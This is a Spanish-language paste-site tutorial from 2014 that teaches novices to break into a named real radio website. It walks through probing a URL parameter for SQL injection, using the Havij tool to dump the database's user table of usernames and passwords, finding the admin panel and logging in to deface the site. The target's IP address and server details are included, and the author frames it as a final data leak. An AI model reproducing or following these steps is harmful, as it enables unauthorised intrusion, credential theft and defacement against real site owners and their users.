TUTORIAL HACKER BY REALTIME


SUBMITTED BY: Guest

DATE: Feb. 1, 2014, 1:36 a.m.

FORMAT: Text only

SIZE: 6.2 kB

HITS: 664

  1. ________________________________________________________________________
  2. +++++++++++++++++++++++++ºº_.TUTORIAL._ºº+++++++++++++++++++++++++++++++
  3. +++++++++++++++++++++++++ºººººººººººººººº+++++++++++++++++++++++++++++++
  4. ++++++++ ___ _ _____ ++++++++
  5. ++++++++| _`\ (_ ) (_ _)_ ++++++++
  6. ++++++++| (_) ) __ _ _ | | | | (_) ___ ___ __ ++++++++
  7. ++++++++| , / /'__`\ /'_` ) | | | | | |/' _ ` _ `\ /'__`\++++++++
  8. ++++++++| |\ \ ( ___/( (_| | | | | | | || ( ) ( ) |( ___/++++++++
  9. ++++++++(_) (_)`\____)`\__,_)(___) (_) (_)(_) (_) (_)`\____)++++++++
  10. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  11. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  12. ++++++++++++++++++++++++++++He decidido retirarme... me pondré a jugar Ragnarok..y tibia también, así que no tengo tiempo para dumps D:
  13. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  14. Así que aquí les va un ultimo filtrado de datos :) les enseñare también como buscarlos..)
  15. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  16. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  17. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  18. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  19. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  20. Hola a todos y bienvenidos a un tutorial de web deface.
  21. Para esto, usare la web Radio Bastarda para enseñarles....
  22. nos metemos a radiobastarda y buscamos donde podemos encontrar una vulnerabilidad... yo encontré esta: http://radiobastarda.com/verNoticiaBastarda.php?idNoticia=113 , como lo se? porque hice esto: http://radiobastarda.com/verNoticiaBastarda.php?idNoticia='113 (podran ver que esta llena de vulnerabilidades xD)
  23. Una vez que tenemos la url con vul procedemos a usar el programa "havij"... ponemos la url (http://radiobastarda.com/verNoticiaBastarda.php?idNoticia=113) en el target y le damos a analyce
  24. Esperamos.....
  25. esperamos.....
  26. Vemos que nos da esta info:
  27. Host IP: 95.211.110.117
  28. Web Server: Apache/2
  29. Powered-by: PHP/5.2.12
  30. Finding Keyword...
  31. +++++++++++++++++++
  32. por mientras.. :D
  33. +++++++++++++++++++
  34. hay vemos que encontró la db:
  35. Injection type is Integer
  36. DB Server: MySQL >=5
  37. Selected Column Count is 4
  38. Valid String Column is 2
  39. Current DB: radiobas_db
  40. ++++++++++++++++++++++
  41. ahora procedemos a hacer click en tables y después en get tables...
  42. ----------------------
  43. fue bastante rápido.. :)
  44. podemos ver que el programa nos dice esto:
  45. Tables found: bastardes,comentario,comentariopublicacion,conductor,etiquetas,etiquetaspublicacion,lamento,noticia,programa,recomendacion,reportaje,usuarios
  46. Lo que nos interesa es tabla "usuarios". Marcamos la tabla y le damos en get collumns
  47. Bueno: Columns found: idUsuario,usuario,password
  48. marcamos usuario, password.
  49. y le damos en get data
  50. Ahora miramos el tesoro (para ti, que es tu primera intrusión en una web ;) )
  51. Count(*) of radiobas_db.usuarios is 8
  52. Data Found: usuario,password=AQUI VA LOS USUARIOS Y PASS
  53. Data Found: usuario,password=Los borre
  54. Data Found: usuario,password=para que no se te haga tan facil
  55. Data Found: usuario,password=cuando hagas el paso anterior los veras en el rpograma havij ;)
  56. Data Found: usuario,password=
  57. Data Found: usuario,password=
  58. Data Found: usuario,password=
  59. Data Found: usuario,password=
  60. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  61. Muy bien, ahora lo que haremos es hacer click en find admin (para encontrar donde cresta poner los datos que sacaste ahora!)
  62. Miren, las dos primeros links nos interesan. uno dice http://asdasda.cl/ (ejemplo) y dice "200 ok". funciona pero la que dice 302 found es la que sirve..
  63. ahora solo queda ingresar datos y LISTO!!
  64. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  65. Felicidades, terminaste el tutorial !:)
  66. Gracias por leerlo también dx
  67. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  68. ________________________________________________________________________
  69. +++++++++++++++++++++++++ºº_.TUTORIAL._ºº+++++++++++++++++++++++++++++++
  70. +++++++++++++++++++++++++ºººººººººººººººº+++++++++++++++++++++++++++++++
  71. ++++++++ ___ _ _____ ++++++++
  72. ++++++++| _`\ (_ ) (_ _)_ ++++++++
  73. ++++++++| (_) ) __ _ _ | | | | (_) ___ ___ __ ++++++++
  74. ++++++++| , / /'__`\ /'_` ) | | | | | |/' _ ` _ `\ /'__`\++++++++
  75. ++++++++| |\ \ ( ___/( (_| | | | | | | || ( ) ( ) |( ___/++++++++
  76. ++++++++(_) (_)`\____)`\__,_)(___) (_) (_)(_) (_) (_)`\____)++++++++
  77. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  78. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  79. Saludos, queridos wannabers :D
  80. Saludos, queridos lammers :D
  81. Saludos, queridos Scripter Kiddies :D
  82. __________________________________________________________________________________________________

comments powered by Disqus